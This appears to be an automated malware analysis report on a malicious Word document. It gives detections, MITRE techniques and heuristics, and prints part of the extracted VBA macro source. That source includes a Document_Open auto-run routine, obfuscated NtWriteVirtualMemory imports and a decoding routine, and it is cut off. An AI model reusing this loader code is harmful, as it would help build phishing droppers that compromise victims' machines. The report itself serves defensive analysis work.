MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample was identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it is a macro-based downloader. The presence of a Document_Open macro and VBA code confirms the use of Visual Basic for execution. The script's intent is to download and execute a second-stage payload, typical of a spearphishing attachment.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12939 bytes |
SHA-256: 155346220b11b1ff787758a62e780333c0a22389a964e54021d4c918fbfa3e18 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
nuts.scribbling
referenced = 48 + 6
Pmt 0, referenced, 26534, 27963, 3
End Sub
Attribute VB_Name = "government"
Attribute VB_Base = "0{3587F659-687C-428C-9384-620A43CBBA3A}{5ABCE747-6263-44D6-96A1-40BB55FCC989}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bobs"
#If (115 - 7 + 292 + 14 - 71 + 357) > ((64 - 5 + 261) - (30 - 25 + 535) * 1) And Not ((121 - 18 - 75) - (36 - 115 + 107)) * 2 < (Win64) Then
Public Declare Function invalidity _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal sag As Any, ByVal casket As Any, ByVal abyss As Any, ByVal hierarchical As Any, ByVal actinomyxidian As Any) As Long
Public Declare Function nonmetal _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (validated As Any) As Long
#End If
#If (112 - 119 + 407 + 74 - 58 + 284) > ((75 - 64 + 309) - (97 - 91 + 534) * 1) And ((40 - 25 + 13) - (78 - 14 - 36)) * 2 < (Win64) Then
Public Declare PtrSafe Function fish _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal gawain As Any, canaliculate As Any, quaestio As Any, putter As Any) As LongPtr
Public Declare PtrSafe Function invalidity _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal anthropomancy As Any, ByVal highprincipled As Any, ByVal audiology As Any, ByVal syllabically As Any, ByVal copulationsex As Any) As LongPtr
#End If
Function mekong(birththroe, kilt, accipitrine)
Dim eelpout As Integer
Dim radiation As Byte
Dim pigeonhole As LongPtr
Dim coralwood As LongPtr
Dim nihilist As LongPtr
Dim graphotype As Byte
Dim displant As LongPtr
Dim musa As LongPtr
ataraxia = ataraxia * 4
osteomalacia = "babylon"
coralwood = birththroe
musa = accipitrine
angas = Rnd(271)
displant = kilt
tombigbee = 59 + 20
Pmt 0, tombigbee, 23203, 49597, 4
osteomalacia = osteomalacia
pigeonhole = 62 - 99 + 36
invalidity ByVal pigeonhole, _
coralwood, _
displant, musa, _
nihilist
wittol = Rnd(200)
End Function
Sub pageNumber()
ActiveDocument.Sections(ActiveDocument.Sections.Count) _
.Headers(wdHeaderFooterPrimary).Range.Select
With Selection
.Paragraphs(1).Alignment = wdAlignParagraphCenter
.TypeText Text:="Page "
.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"PAGE ", PreserveFormatting:=True
.TypeText Text:=" of "
.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"NUMPAGES ", PreserveFormatting:=True
End With
End Sub
End Sub
Function patera(akimbo, praya, nonproduction)
If nonproduction = 34 + (10 / 2 - 5) Then
patera = akimbo \ praya
ElseIf nonproduction = 44 + (5 - 3) / 2 - 1 Then
patera = akimbo And praya
ElseIf nonproduction = 52 + (56 / 7 - 4 * 2) Then
patera = akimbo * praya
End If
End Function
Attribute VB_Name = "jecur"
Function pickelhaube()
Dim hemostat(255) As Byte
disorder = 68 - 96 + 93
For i = disorder To (113 - 74 + 52)
hemostat(disorder) = disorder - (27 - 75 + 113)
disorder = disorder + 1
If (45 - 44 + 90) < disorder Then Exit For
Next
disorder = (38 - 25 + 35)
For i = disorder To (73 - 50 + 35)
hemostat(disorder) = disorder + (18 - 5 - 9)
disorder = disorder + 1
If (52 - 116 + 122) < disorder Then Exit For
Next
disorder = (50 - 62 + 109)
For i = disorder To (97 - 59 + 85)
hemostat(disorder) = disorder - (96 - 73 + 48)
disorder = disorder + 1
If (87 - 106 + 142) < disorder Then Exit For
Next
hemostat(121 - 127 + 53) = (98 - 115 + 80)
disorder = (23 - 87 + 107)
hemostat(disorder) = (71 - 39 + 30)
pickelhaube = hemostat
End Function
Function unstained(deviltry) As String
Dim araroba(63) As Long
Dim smugness() As Byte
Dim leaden As Long
Dim misjudgent(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.